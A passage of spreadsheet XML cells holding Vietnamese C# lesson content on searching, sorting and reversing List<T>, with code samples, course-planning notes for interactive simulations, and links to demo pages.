// Kiểm tra xem tất cả các điểm đều lớn hơn 70 không
bool tatCaTren70 = danhSachDiem.All(diem =&gt; diem &gt; 70);
Console.WriteLine($"Tất cả các điểm đều trên 70 không? {tatCaTren70}"); // Output: False (vì có 60, 55)
List&lt;string&gt; danhSachTen = new List&lt;string&gt; { "Alice", "Bob", "Charlie" };
// Kiểm tra xem có tên nào bắt đầu bằng 'A' không
bool coTenBatDauBangA = danhSachTen.Any(ten =&gt; ten.StartsWith("A"));
Console.WriteLine($"Có tên nào bắt đầu bằng 'A' không? {coTenBatDauBangA}"); // Output: True
// Kiểm tra xem tất cả các tên đều có độ dài lớn hơn 3 không
bool tatCaDaiHon3 = danhSachTen.All(ten =&gt; ten.Length &gt; 3);
Console.WriteLine($"Tất cả các tên đều dài hơn 3 ký tự không? {tatCaDaiHon3}"); // Output: True
Any() và All() rất mạnh mẽ để kiểm tra các quy tắc nghiệp vụ hoặc điều kiện tổng quát trên một tập hợp dữ liệu mà không cần phải duyệt qua toàn bộ danh sách một cách thủ công. Chúng giúp mã nguồn trở nên ngắn gọn và dễ đọc hơn.</t>
        </is>
      </c>
      <c r="W5" s="22" t="inlineStr">
        <is>
          <t># Tìm kiếm phần tử trong List&lt;T&gt;
## Mục tiêu học tập
Sau bài học này, bạn có thể:
- Dùng `IndexOf` để lấy vị trí đầu tiên của một giá trị (hoặc -1 nếu không có) và `Contains` để biết có hay không.
- Viết điều kiện tìm kiếm bằng biểu thức lambda (`Predicate&lt;T&gt;`).
- Phân biệt `Find` (một phần tử đầu tiên), `FindAll` (mọi phần tử khớp) và `Exists` (chỉ có hay không).
- Nhận ra `Find` trả về giá trị mặc định (`default`) khi không tìm thấy.
- Quan sát cách phép tìm quét từng ô từ đầu danh sách bằng hoạt động mô phỏng.
## Tìm theo giá trị: IndexOf và Contains
- `IndexOf(x)` trả về **chỉ số của lần xuất hiện đầu tiên** của `x`, hoặc **-1** nếu không có.
- `LastIndexOf(x)` tương tự nhưng tìm lần xuất hiện cuối cùng.
- `Contains(x)` trả về `true` hoặc `false`. Kết quả giống `IndexOf(x) &gt;= 0`.
```csharp
using System;
using System.Collections.Generic;
public class Program
{
    public static void Main()
    {
        var scores = new List&lt;int&gt; { 7, 4, 9, 6, 9, 3 };
        int a = scores.IndexOf(9);          // 2 (9 xuất hiện ở ô 2 và ô 4, lấy ô đầu)
        int b = scores.IndexOf(5);          // -1 (không có)
        bool c = scores.Contains(9);        // true
        int d = scores.LastIndexOf(9);      // 4
        Console.WriteLine($"{a} {b} {c} {d}");   // 2 -1 True 4
    }
}
```
Với kiểu đối tượng do bạn tự viết, `IndexOf` và `Contains` so sánh bằng `Equals`. Nếu không ghi đè `Equals`, hai đối tượng chỉ "bằng nhau" khi là cùng một đối tượng.
## Tìm theo điều kiện: Find, FindAll, Exists
Đôi khi bạn không biết giá trị cụ thể, chỉ biết điều kiện, ví dụ "điểm lớn hơn 8". Khi đó bạn đưa vào một **điều kiện** (predicate): hàm nhận một phần tử và trả về `bool`. Cách viết gọn nhất là **biểu thức lambda** `x =&gt; x &gt; 8`, đọc là "với mỗi x, kiểm tra x &gt; 8".
| Phương thức | Trả về | Khi không có phần tử khớp |
|---|---|---|
| `Find(điều kiện)` | Phần tử khớp **đầu tiên** | `default(T)`: 0 với `int`, `null` với đối tượng |
| `FindAll(điều kiện)` | **List mới** chứa mọi phần tử khớp | List rỗng |
| `Exists(điều kiện)` | `bool` | `false` |
```csharp
var scores = new List&lt;int&gt; { 7, 4, 9, 6, 9, 3 };
int a = scores.Find(x =&gt; x &gt; 8);            // 9
int b = scores.Find(x =&gt; x &gt; 100);          // 0 (default(int))
List&lt;int&gt; r = scores.FindAll(x =&gt; x &gt;= 6);  // { 7, 9, 6, 9 }
bool e = scores.Exists(x =&gt; x &lt; 4);         // true
```
**Lưu ý:** `Find` trả `0` khi không thấy, nhưng `0` cũng có thể là một điểm hợp lệ, nên khó phân biệt "không thấy" với "tìm được 0". Khi cần phân biệt, hãy dùng `FindIndex` (trả -1 nếu không thấy) hoặc `Exists`.
Nếu bạn đã học LINQ, `Any(điều kiện)` và `All(điều kiện)` (cần `using System.Linq;`) làm việc tương tự cho các câu hỏi "có phần tử nào..." và "mọi phần tử đều...".
## Mọi phép tìm đều quét từ đầu
Cả `IndexOf`, `Find`, `FindAll` và `Exists` đều **duyệt tuần tự từ đầu danh sách**. Chúng khác nhau ở chỗ dừng:
- `IndexOf`, `Find`, `Exists` **dừng ngay** khi gặp phần tử khớp đầu tiên.
- `FindAll` **không dừng sớm**, phải xét hết để gom đủ mọi phần tử khớp.
- Nếu không có phần tử khớp, mọi phép tìm đều phải xét hết danh sách.
## Hoạt động: Quét từng ô
Mô phỏng dưới đây dùng danh sách `scores` gồm 7, 4, 9, 6, 9, 3 (chỉ số 0 đến 5). Hãy thao tác theo thứ tự sau, bấm **Bước tiếp** để chạy từng dòng:
- Mở tab **IndexOf / Contains**. Con trỏ "đang xét" đi qua từng ô, mỗi ô hiện `true` hoặc `false`. `IndexOf(9)` xét ô 0 (7) và ô 1 (4), rồi khớp ở ô 2 và dừng ngay, không xét ô 4 dù cũng là 9. Kết quả là 2. `IndexOf(5)` phải quét hết 6 ô rồi trả về -1. `Contains(9)` cho `true`.
- Mở tab **Find**. `Find(x =&gt; x &gt; 8)` thử 7 và 4 (đều `false`), đến 9 thì `true`, trả về chính phần tử 9 và dừng. `Find(x =&gt; x &gt; 100)` xét hết 6 ô mà không có ô nào khớp nên trả về `default(int)`, tức là 0 (thẻ cảnh báo vàng).
- Mở tab **FindAll**. Điều kiện `x &gt;= 6` xét đủ sáu ô. Mỗi phần tử khớp (7, 9, 6, 9) được thả vào danh sách kết quả `r` (ô mới màu xanh). Kết quả cuối là {7, 9, 6, 9}, còn `scores` vẫn đủ 6 phần tử.
- Mở tab **Exists**. Điều kiện `x &lt; 4` lần lượt xét 7, 4, 9, 6, 9 (đều `false`), đến 3 thì `true`. `Exists` trả về `true` sau khi xét 6 ô.
```
&lt;iframe src="https://codegym-vn.github.io/programming-course-demos/c-sharp-ung-dung/cau-truc-du-lieu-nang-cao-collections/thao-tac-nang-cao-voi-list-t/tim-kiem-phan-tu-trong-list-t/" title="Tìm kiếm phần tử trong List&lt;T&gt;" style="border:0;" allowfullscreen&gt;&lt;/iframe&gt;
```
Điều rút ra: mọi phép tìm trong `List&lt;T&gt;` đều quét tuần tự từ đầu. Mỗi phương thức trả về một thứ khác nhau: vị trí (`IndexOf`), một phần tử (`Find`), một List mới (`FindAll`) hoặc đúng/sai (`Exists`, `Contains`). Chọn phương thức theo điều bạn cần biết.
## Tóm tắt
- `IndexOf(x)` trả về chỉ số lần xuất hiện đầu tiên, hoặc -1 nếu không có. `Contains(x)` chỉ cho biết có hay không.
- Điều kiện tìm kiếm viết bằng lambda, ví dụ `x =&gt; x &gt; 8`.
- `Find` trả về phần tử khớp đầu tiên, hoặc `default(T)` (0 với `int`, `null` với đối tượng) nếu không có.
- `FindAll` trả về List mới chứa mọi phần tử khớp, danh sách gốc không đổi.
- `Exists` chỉ trả về `true` hoặc `false` và dừng ngay khi gặp phần tử khớp.</t>
        </is>
      </c>
    </row>
    <row r="6" ht="409.6" customHeight="1" s="18">
      <c r="A6" s="10" t="n">
        <v>5</v>
      </c>
      <c r="B6" s="10" t="inlineStr">
        <is>
          <t>1. Cấu trúc dữ liệu nâng cao: Collections</t>
        </is>
      </c>
      <c r="C6" s="10" t="inlineStr">
        <is>
          <t>Thao tác nâng cao với List&lt;T&gt;</t>
        </is>
      </c>
      <c r="D6" s="10" t="inlineStr">
        <is>
          <t>Sắp xếp và Đảo ngược List&lt;T&gt;</t>
        </is>
      </c>
      <c r="E6" s="10" t="inlineStr">
        <is>
          <t>Bài đọc</t>
        </is>
      </c>
      <c r="F6" s="11" t="inlineStr">
        <is>
          <t>Nên làm</t>
        </is>
      </c>
      <c r="G6" s="16" t="inlineStr">
        <is>
          <t>Done</t>
        </is>
      </c>
      <c r="H6" s="10" t="inlineStr">
        <is>
          <t>Thấy kết quả Sort() với số, chuỗi, đối tượng theo tiêu chí riêng, và Reverse() chỉ lật thứ tự.</t>
        </is>
      </c>
      <c r="I6" s="10" t="inlineStr">
        <is>
          <t>1 cột, 4 tab</t>
        </is>
      </c>
      <c r="J6" s="10" t="inlineStr">
        <is>
          <t>Hai hàng ô 'trước' và 'sau', đường nối từ vị trí cũ tới vị trí mới. Tab đối tượng dùng thẻ sản phẩm (tên + giá); hiện vài phép so sánh mẫu với kết quả âm/0/dương.</t>
        </is>
      </c>
      <c r="K6" s="10" t="inlineStr">
        <is>
          <t>H01, H17</t>
        </is>
      </c>
      <c r="L6" s="10" t="inlineStr">
        <is>
          <t>Sort số | Sort chuỗi | Sort theo thuộc tính | Reverse</t>
        </is>
      </c>
      <c r="M6" s="10" t="inlineStr">
        <is>
          <t>Sort số: {5, 2, 8, 1} → {1, 2, 5, 8}. Nhấn mạnh Sort sửa chính danh sách, không tạo danh sách mới.
Sort chuỗi: {"Minh", "An", "Lan", "Bao"} → {"An", "Bao", "Lan", "Minh"}.
Sort theo thuộc tính: products.Sort((a, b) =&gt; a.Price.CompareTo(b.Price)); hiện 2-3 phép so sánh mẫu (5000 vs 12000 → âm: a đứng trước). Đổi thành b.Price.CompareTo(a.Price) → giảm dần.
Reverse: {1, 2, 5, 8} → {8, 5, 2, 1}. Thử Reverse trên {5, 2, 8, 1} → {1, 8, 2, 5} để thấy Reverse không sắp xếp.
Bước cuối mỗi tab: hai hàng trước/sau.</t>
        </is>
      </c>
      <c r="N6" s="10" t="inlineStr">
        <is>
          <t>Số {5, 2, 8, 1}; tên không dấu; sản phẩm: Bút 5000, Vở 12000, Thước 8000</t>
        </is>
      </c>
      <c r="O6" s="10" t="inlineStr">
        <is>
          <t>Sort() và Reverse() thay đổi trực tiếp danh sách; sắp theo tiêu chí riêng bằng cách truyền hàm so sánh.</t>
        </is>
      </c>
      <c r="P6" s="10" t="inlineStr">
        <is>
          <t>Sort chuỗi mặc định theo quy tắc văn hóa (culture) nên ví dụ dùng tên không dấu cho dễ đoán. List.Sort không ổn định (các phần tử bằng nhau có thể đổi thứ tự); cần ổn định thì dùng OrderBy.</t>
        </is>
      </c>
      <c r="Q6" s="10" t="inlineStr">
        <is>
          <t>c-sharp-ung-dung/cau-truc-du-lieu-nang-cao-collections/thao-tac-nang-cao-voi-list-t/sap-xep-va-dao-nguoc-list-t/index.html</t>
        </is>
      </c>
      <c r="R6" s="10" t="inlineStr">
        <is>
          <t>https://codegym-vn.github.io/programming-course-demos/c-sharp-ung-dung/cau-truc-du-lieu-nang-cao-collections/thao-tac-nang-cao-voi-list-t/sap-xep-va-dao-nguoc-list-t/</t>
        </is>
      </c>
      <c r="S6" s="10" t="n"/>
      <c r="T6" s="12" t="n"/>
      <c r="U6" s="12" t="n"/>
      <c r="V6" s="21" t="inlineStr">
        <is>
          <t>Sắp xếp đơn giản với Sort()
Một trong những thao tác phổ biến nhất với danh sách dữ liệu là sắp xếp chúng theo một thứ tự nhất định. C# cung cấp phương thức Sort() cho List&lt;T&gt; để thực hiện việc này một cách dễ dàng.
Khi bạn gọi Sort() mà không truyền bất kỳ tham số nào, List&lt;T&gt; sẽ cố gắng sắp xếp các phần tử theo thứ tự tăng dần (mặc định). Điều này hoạt động tốt với các kiểu dữ liệu cơ bản như số nguyên (int), số thực (double), chuỗi (string) vì chúng đã có cơ chế so sánh mặc định.
Ví dụ sắp xếp một danh sách số nguyên:
using System;
using System.Collections.Generic;
public class Program
{
    public static void Main(string[] args)
    {
        List&lt;int&gt; soNguyen = new List&lt;int&gt; { 5, 2, 8, 1, 9, 3 };
        Console.WriteLine("Danh sách gốc: " + string.Join(", ", soNguyen));
        soNguyen.Sort(); // Sắp xếp theo thứ tự tăng dần mặc định
        Console.WriteLine("Danh sách sau khi sắp xếp: " + string.Join(", ", soNguyen));
        List&lt;string&gt; tenSinhVien = new List&lt;string&gt; { "An", "Binh", "Huy", "Dat", "Chi" };
        Console.WriteLine("Danh sách tên gốc: " + string.Join(", ", tenSinhVien));
        tenSinhVien.Sort(); // Sắp xếp theo thứ tự bảng chữ cái mặc định
        Console.WriteLine("Danh sách tên sau khi sắp xếp: " + string.Join(", ", tenSinhVien));
    }
}
Kết quả:
Danh sách gốc: 5, 2, 8, 1, 9, 3
Danh sách sau khi sắp xếp: 1, 2, 3, 5, 8, 9
Danh sách tên gốc: An, Binh, Huy, Dat, Chi
Danh sách tên sau khi sắp xếp: An, Binh, Chi, Dat, Huy
Đối với các kiểu dữ liệu tùy chỉnh (ví dụ: một class hoặc struct mà bạn tự định nghĩa), để Sort() hoạt động mặc định, kiểu dữ liệu đó cần phải triển khai giao diện IComparable&lt;T&gt;. Nếu không, bạn sẽ nhận được một lỗi khi cố gắng sắp xếp.
Sắp xếp các kiểu dữ liệu phức tạp: IComparable&lt;T&gt;, IComparer&lt;T&gt; và Comparer&lt;T&gt;
Khi làm việc với các đối tượng phức tạp, bạn thường cần sắp xếp chúng dựa trên một hoặc nhiều thuộc tính cụ thể. C# cung cấp các cơ chế linh hoạt để tùy chỉnh logic sắp xếp: IComparable&lt;T&gt;, IComparer&lt;T&gt; và Comparer&lt;T&gt;.
Sắp xếp bằng cách triển khai IComparable&lt;T&gt;
Khi một lớp triển khai giao diện IComparable&lt;T&gt;, nó tự định nghĩa cách các thể hiện của chính nó được so sánh với nhau. Điều này hữu ích khi có một cách sắp xếp "tự nhiên" hoặc mặc định cho đối tượng đó.
Ví dụ, một lớp SanPham có thể được sắp xếp mặc định theo MaSanPham.
using System;
using System.Collections.Generic;
public class SanPham : IComparable&lt;SanPham&gt;
{
    public int MaSanPham { get; set; }
    public string TenSanPham { get; set; }
    public decimal Gia { get; set; }
    public SanPham(int ma, string ten, decimal gia)
    {
        MaSanPham = ma;
        TenSanPham = ten;
        Gia = gia;
    }
    public int CompareTo(SanPham other)
    {
        if (other == null) return 1; // Null is always "less"
        return this.MaSanPham.CompareTo(other.MaSanPham); // Sắp xếp theo MaSanPham
    }
    public override string ToString()
    {
        return $"[{MaSanPham}] {TenSanPham} - {Gia:C}";
    }
}
public class Program
{
    public static void Main(string[] args)
    {
        List&lt;SanPham&gt; danhSachSanPham = new List&lt;SanPham&gt;
        {
            new SanPham(103, "Bánh mì", 15000),
            new SanPham(101, "Sữa tươi", 25000),
            new SanPham(102, "Nước ngọt", 12000)
        };
        Console.WriteLine("Danh sách sản phẩm gốc:");
        danhSachSanPham.ForEach(Console.WriteLine);
        danhSachSanPham.Sort(); // Sắp xếp theo MaSanPham (do IComparable&lt;SanPham&gt;)
        Console.WriteLine("\nDanh sách sản phẩm sau khi sắp xếp theo mã:");
        danhSachSanPham.ForEach(Console.WriteLine);
    }
}
Sắp xếp với IComparer&lt;T&gt; hoặc Comparer&lt;T&gt;
Đôi khi, bạn muốn sắp xếp một đối tượng theo nhiều cách khác nhau hoặc không muốn sửa đổi lớp đối tượng gốc. Trong trường hợp này, bạn có thể tạo một lớp riêng triển khai giao diện IComparer&lt;T&gt;.
Comparer&lt;T&gt; là một lớp trừu tượng cung cấp cách tạo các bộ so sánh tùy chỉnh dễ dàng hơn, thường được dùng thông qua Comparer&lt;T&gt;.Default (nếu kiểu T triển khai IComparable&lt;T&gt;) hoặc bằng cách kế thừa và ghi đè phương thức Compare.
Ví dụ sắp xếp SanPham theo Gia bằng IComparer&lt;T&gt;:
using System;
using System.Collections.Generic;
// ... (Lớp SanPham như trên, không cần IComparable&lt;T&gt; nếu bạn chỉ dùng IComparer&lt;T&gt;)
public class SanPhamTheoGiaComparer : IComparer&lt;SanPham&gt;
{
    public int Compare(SanPham x, SanPham y)
    {
        if (x == null &amp;&amp; y == null) return 0;
        if (x == null) return -1; // null is "less" than a valid object
        if (y == null) return 1;
        return x.Gia.CompareTo(y.Gia); // Sắp xếp theo Gia tăng dần
    }
}
public class Program
{
    public static void Main(string[] args)
    {
        List&lt;SanPham&gt; danhSachSanPham = new List&lt;SanPham&gt;
        {
            new SanPham(103, "Bánh mì", 15000),
            new SanPham(101, "Sữa tươi", 25000),
            new SanPham(102, "Nước ngọt", 12000)
        };
        Console.WriteLine("Danh sách sản phẩm gốc:");
        danhSachSanPham.ForEach(Console.WriteLine);
        // Sắp xếp theo giá sử dụng IComparer&lt;SanPham&gt;
        danhSachSanPham.Sort(new SanPhamTheoGiaComparer());
        Console.WriteLine("\nDanh sách sản phẩm sau khi sắp xếp theo giá:");
        danhSachSanPham.ForEach(Console.WriteLine);
    }
}
Sắp xếp tùy chỉnh với biểu thức Lambda
Để đơn giản hóa việc sắp xếp tùy chỉnh mà không cần tạo một lớp IComparer&lt;T&gt; riêng biệt, bạn có thể sử dụng biểu thức lambda trực tiếp với phương thức Sort() của List&lt;T&gt;. Đây là cách rất phổ biến và linh hoạt trong C#.
Phương thức Sort() có một overload chấp nhận một Comparison&lt;T&gt; delegate, và biểu thức lambda là cách tuyệt vời để triển khai delegate này.
Ví dụ sắp xếp SanPham theo TenSanPham (tăng dần) và sau đó theo Gia (giảm dần) sử dụng lambda:
using System;
using System.Collections.Generic;
// ... (Lớp SanPham như trên)
public class Program
{
    public static void Main(string[] args)
    {
        List&lt;SanPham&gt; danhSachSanPham = new List&lt;SanPham&gt;
        {
            new SanPham(103, "Bánh mì", 15000),
            new SanPham(101, "Sữa tươi", 25000),
            new SanPham(102, "Nước ngọt", 12000),
            new SanPham(104, "Sữa chua", 20000)
        };
        Console.WriteLine("Danh sách sản phẩm gốc:");
        danhSachSanPham.ForEach(Console.WriteLine);
        // Sắp xếp theo TenSanPham tăng dần
        danhSachSanPham.Sort((sp1, sp2) =&gt; sp1.TenSanPham.CompareTo(sp2.TenSanPham));
        Console.WriteLine("\nDanh sách sản phẩm sau khi sắp xếp theo Tên sản phẩm:");
        danhSachSanPham.ForEach(Console.WriteLine);
        // Sắp xếp theo Giá giảm dần
        danhSachSanPham.Sort((sp1, sp2) =&gt; sp2.Gia.CompareTo(sp1.Gia)); // Đảo ngược sp1 và sp2 để sắp xếp giảm dần
        Console.WriteLine("\nDanh sách sản phẩm sau khi sắp xếp theo Giá giảm dần:");
        danhSachSanPham.ForEach(Console.WriteLine);
        // Sắp xếp theo TenSanPham tăng dần, nếu tên giống nhau thì sắp xếp theo Giá giảm dần
        danhSachSanPham.Sort((sp1, sp2) =&gt; {
            int result = sp1.TenSanPham.CompareTo(sp2.TenSanPham);
            if (result == 0) // Nếu tên giống nhau
            {
                result = sp2.Gia.CompareTo(sp1.Gia); // Sắp xếp theo giá giảm dần
            }
            return result;
        });
        Console.WriteLine("\nDanh sách sản phẩm sau khi sắp xếp theo Tên tăng dần, Giá giảm dần:");
        danhSachSanPham.ForEach(Console.WriteLine);
    }
}
Biểu thức lambda giúp code gọn gàng và dễ đọc hơn rất nhiều cho các trường hợp sắp xếp tùy chỉnh "một lần dùng".
Đảo ngược thứ tự với Reverse()
Bên cạnh việc sắp xếp, đôi khi bạn chỉ muốn đảo ngược thứ tự hiện tại của các phần tử trong List&lt;T&gt;. Phương thức Reverse() thực hiện chính xác điều này. Nó thay đổi vị trí của các phần tử trong danh sách, đưa phần tử cuối cùng lên đầu, phần tử đầu tiên xuống cuối, v.v.
Ví dụ:
using System;
using System.Collections.Generic;
public class Program
{
    public static void Main(string[] args)
    {
        List&lt;string&gt; chuCai = new List&lt;string&gt; { "A", "B", "C", "D", "E" };
        Console.WriteLine("Danh sách gốc: " + string.Join(", ", chuCai));
        chuCai.Reverse(); // Đảo ngược thứ tự
        Console.WriteLine("Danh sách sau khi đảo ngược: " + string.Join(", ", chuCai));
        List&lt;int&gt; soNguyen = new List&lt;int&gt; { 1, 2, 3, 4, 5 };
        Console.WriteLine("Danh sách số nguyên gốc: " + string.Join(", ", soNguyen));
        soNguyen.Reverse();
        Console.WriteLine("Danh sách số nguyên sau khi đảo ngược: " + string.Join(", ", soNguyen));
    }
}
Kết quả:
Danh sách gốc: A, B, C, D, E
Danh sách sau khi đảo ngược: E, D, C, B, A
Danh sách số nguyên gốc: 1, 2, 3, 4, 5
Danh sách số nguyên sau khi đảo ngược: 5, 4, 3, 2, 1
Phương thức Reverse() cũng có một overload cho phép bạn đảo ngược một phần của danh sách bằng cách chỉ định index bắt đầu và count số phần tử cần đảo ngược.
Tổng kết
Trong bài học này, chúng ta đã khám phá các phương pháp mạnh mẽ để quản lý thứ tự các phần tử trong List&lt;T&gt;:
Sort() mặc định: Để sắp xếp các kiểu dữ liệu cơ bản hoặc các đối tượng triển khai IComparable&lt;T&gt; theo thứ tự tăng dần.
IComparer&lt;T&gt; / Comparer&lt;T&gt;: Để định nghĩa logic sắp xếp tùy chỉnh bên ngoài lớp đối tượng, hữu ích khi bạn cần nhiều cách sắp xếp khác nhau hoặc không thể sửa đổi lớp gốc.
Biểu thức Lambda: Cung cấp một cách gọn gàng và linh hoạt để định nghĩa logic sắp xếp tùy chỉnh trực tiếp tại chỗ, rất phổ biến cho các trường hợp sắp xếp cụ thể.
Reverse(): Đơn giản đảo ngược thứ tự hiện có của các phần tử trong danh sách.
Việc nắm vững các kỹ thuật này sẽ giúp bạn thao tác dữ liệu trong List&lt;T&gt; một cách hiệu quả và linh hoạt hơn rất nhiều trong các ứng dụng C#.</t>
        </is>
      </c>
      <c r="W6" s="22" t="inlineStr">
        <is>
          <t># Sắp xếp và Đảo ngược List&lt;T&gt;
## Mục tiêu học tập
Sau bài học này, bạn có thể:
- Dùng `Sort()` để sắp xếp tăng dần danh sách số hoặc chuỗi.
- Giải thích `Sort()` và `Reverse()` đều sửa trực tiếp danh sách gốc.
- Chọn giữa ba cách sắp xếp đối tượng: `IComparable&lt;T&gt;`, `IComparer&lt;T&gt;` và lambda.
- Viết hàm so sánh bằng lambda để sắp xếp theo một hoặc nhiều thuộc tính, tăng dần hoặc giảm dần.
- Phân biệt `Reverse()` (lật thứ tự) với `Sort()` (sắp xếp).
- Quan sát từng cặp so sánh và các ô đổi chỗ bằng hoạt động mô phỏng.
## Sort(): sắp xếp tăng dần
`Sort()` xếp các phần tử của `List&lt;T&gt;` theo thứ tự tăng dần, **ngay trên danh sách gốc**. Không có danh sách mới nào được tạo, và thứ tự cũ không còn nữa. Nếu muốn giữ bản cũ, hãy chép ra một List khác trước khi sắp xếp.
Cách này hoạt động tốt với `int`, `double`, `string`... vì các kiểu này đã có sẵn cách so sánh mặc định.
```csharp
using System;
using System.Collections.Generic;
public class Program
{
    public static void Main()
    {
        var a = new List&lt;int&gt; { 5, 2, 8, 1 };
        a.Sort();
        Console.WriteLine(string.Join(", ", a));       // 1, 2, 5, 8
        var names = new List&lt;string&gt; { "Minh", "An", "Lan", "Bao" };
        names.Sort();
        Console.WriteLine(string.Join(", ", names));   // An, Bao, Lan, Minh
    }
}
```
Với chuỗi, `Sort()` so sánh theo **thứ tự chữ cái**, bắt đầu từ ký tự đầu tiên. Ví dụ trên dùng tên không dấu cho dễ đoán. Chuỗi có dấu tiếng Việt được so sánh theo quy tắc ngôn ngữ (culture) của máy, nên thứ tự có thể khác với bảng chữ cái tiếng Việt.
## Sắp xếp đối tượng tự định nghĩa
`Sort()` không tự biết cách so sánh hai đối tượng do bạn viết, ví dụ hai `Product`. Có ba cách để chỉ cho nó. Cả ba đều dựa trên cùng một quy ước: hàm so sánh trả về số **âm** nếu `a` đứng trước `b`, số **dương** nếu `a` phải đứng sau `b` (hai bên đổi chỗ), và **0** nếu coi như bằng nhau. Kiểu số và chuỗi đều có sẵn `CompareTo` để tạo ra kết quả này.
Các ví dụ dưới đây dùng chung lớp `Product`:
```csharp
public class Product
{
    public string Name { get; set; }
    public int Price { get; set; }
    public override string ToString() =&gt; $"{Name} {Price}";
}
```
### Cách 1: IComparable&lt;T&gt; (thứ tự "tự nhiên")
Nếu lớp có một cách sắp xếp mặc định, hãy cho lớp cài đặt `IComparable&lt;T&gt;`. Khi đó gọi `Sort()` không tham số là đủ.
```csharp
public class Product : IComparable&lt;Product&gt;
{
    public string Name { get; set; }
    public int Price { get; set; }
    public int CompareTo(Product other)
    {
        if (other == null) return 1;    // mọi đối tượng đều "lớn hơn" null
        return Price.CompareTo(other.Price);
    }
}
// products.Sort();   // sắp theo giá tăng dần
```
Nếu lớp không cài đặt `IComparable&lt;T&gt;` mà bạn vẫn gọi `Sort()` không tham số, chương trình sẽ báo lỗi lúc chạy.
### Cách 2: IComparer&lt;T&gt; (bộ so sánh riêng)
Khi cần nhiều cách sắp xếp khác nhau, hoặc không sửa được lớp gốc, hãy viết một lớp riêng cài đặt `IComparer&lt;T&gt;` rồi truyền vào `Sort`:
```csharp
using System.Collections.Generic;
public class ProductByNameComparer : IComparer&lt;Product&gt;
{
    public int Compare(Product x, Product y)
    {
        return string.Compare(x.Name, y.Name);
    }
}
// products.Sort(new ProductByNameComparer());
```
### Cách 3: Lambda (gọn nhất)
`Sort` còn nhận một hàm so sánh dạng lambda `(a, b) =&gt; ...`. Đây là cách phổ biến nhất cho kiểu sắp xếp "dùng một lần":
```csharp
using System;
using System.Collections.Generic;
public class Program
{
    public static void Main()
    {
        var products = new List&lt;Product&gt;
        {
            new Product { Name = "Bút", Price = 5000 },
            new Product { Name = "Vở", Price = 12000 },
            new Product { Name = "Thước", Price = 8000 }
        };
        // Giá tăng dần
        products.Sort((a, b) =&gt; a.Price.CompareTo(b.Price));
        Console.WriteLine(string.Join(", ", products));   // Bút 5000, Thước 8000, Vở 12000
        // Giá giảm dần: đảo vế a và b
        products.Sort((a, b) =&gt; b.Price.CompareTo(a.Price));
        Console.WriteLine(string.Join(", ", products));   // Vở 12000, Thước 8000, Bút 5000
    }
}
```
Muốn đổi chiều sắp xếp, chỉ cần **đảo vai trò hai vế** `a` và `b`.
Nếu muốn sắp theo nhiều tiêu chí (ví dụ tên tăng dần, tên trùng thì giá giảm dần), hãy so sánh tiêu chí đầu trước, chỉ khi bằng nhau (kết quả 0) mới xét tiêu chí sau:
```csharp
products.Sort((a, b) =&gt;
{
    int result = a.Name.CompareTo(b.Name);
    if (result == 0)
    {
        result = b.Price.CompareTo(a.Price);
    }
    return result;
});
```
Nếu không muốn thay đổi danh sách gốc, LINQ có `OrderBy` (cần `using System.Linq;`). Nó trả về một dãy mới đã sắp xếp.
## Reverse(): lật ngược thứ tự
`Reverse()` chỉ **đảo vị trí**: phần tử đầu thành cuối và ngược lại. Nó không so sánh giá trị nào, nên không phải là sắp xếp. Giống `Sort()`, nó sửa trực tiếp danh sách gốc.
```csharp
var a = new List&lt;int&gt; { 1, 2, 5, 8 };
a.Reverse();   // 8, 5, 2, 1
var b = new List&lt;int&gt; { 5, 2, 8, 1 };
b.Reverse();   // 1, 8, 2, 5 (chỉ là bản lật ngược, chưa được sắp xếp)
```
`Reverse(index, count)` có thể lật ngược chỉ một đoạn của danh sách. Muốn danh sách giảm dần, hãy `Sort()` rồi mới `Reverse()`, hoặc dùng hàm so sánh đảo vế như trên.
| Phương thức | Làm gì | Thay đổi danh sách gốc |
|---|---|---|
| `Sort()` | Sắp xếp tăng dần theo thứ tự mặc định | Có |
| `Sort((a, b) =&gt; ...)` | Sắp xếp theo tiêu chí tự chọn | Có |
| `Reverse()` | Lật ngược thứ tự hiện có | Có |
## Hoạt động: Sắp xếp và lật ngược
Mô phỏng dưới đây có bốn tab. Ở mỗi tab, hãy bấm **Bước tiếp** để chạy từng dòng:
- Mở tab **Sort số**. Danh sách `a` ban đầu là {5, 2, 8, 1}. Sau `a.Sort()`, hình chia hai hàng "trước" và "sau": các ô mới màu xanh, dưới mỗi ô ghi số đó đến từ ô nào của danh sách cũ. Kết quả {1, 2, 5, 8}, và thứ tự cũ không còn nữa.
- Mở tab **Sort chuỗi**. Danh sách `names` là Minh, An, Lan, Bao, và dưới mỗi ô hiện chữ cái đầu. `names.Sort()` xếp thành An, Bao, Lan, Minh theo chữ cái đầu.
- Mở tab **Sort theo thuộc tính**. Có ba sản phẩm: Bút 5000, Vở 12000, Thước 8000. Hình dòng chảy cho thấy một cặp so sánh. Bút so với Vở cho kết quả âm nên giữ nguyên. Vở so với Thước cho kết quả dương nên hai ô đổi chỗ. Sau lần Sort đầu: Bút 5000, Thước 8000, Vở 12000. Khi đảo vế thành `b.Price.CompareTo(a.Price)`, kết quả thành giá giảm dần: Vở 12000, Thước 8000, Bút 5000.
- Mở tab **Reverse**. Danh sách `a` = {1, 2, 5, 8} sau `Reverse()` thành {8, 5, 2, 1}. Danh sách `b` = {5, 2, 8, 1} sau `Reverse()` chỉ thành {1, 8, 2, 5}, vẫn lộn xộn vì `Reverse` không sắp xếp.
```
&lt;iframe src="https://codegym-vn.github.io/programming-course-demos/c-sharp-ung-dung/cau-truc-du-lieu-nang-cao-collections/thao-tac-nang-cao-voi-list-t/sap-xep-va-dao-nguoc-list-t/" title="Sắp xếp và đảo ngược List&lt;T&gt;" style="border:0;" allowfullscreen&gt;&lt;/iframe&gt;
```
Điều rút ra: `Sort` và `Reverse` đều thay đổi chính danh sách gốc. `Sort` dựa trên so sánh giá trị (kể cả theo tiêu chí bạn tự đưa vào), còn `Reverse` chỉ lật ngược vị trí và không hề so sánh.
## Tóm tắt
- `Sort()` sắp xếp tăng dần ngay trên danh sách gốc, dùng được cho số và chuỗi.
- Với đối tượng, có ba cách: cài `IComparable&lt;T&gt;`, viết lớp `IComparer&lt;T&gt;`, hoặc truyền lambda `(a, b) =&gt; a.Price.CompareTo(b.Price)`.
- Kết quả so sánh âm nghĩa là `a` đứng trước `b`. Đảo vế `a` và `b` để đổi sang giảm dần.
- Sắp theo nhiều tiêu chí: xét tiêu chí sau khi tiêu chí trước cho kết quả 0.
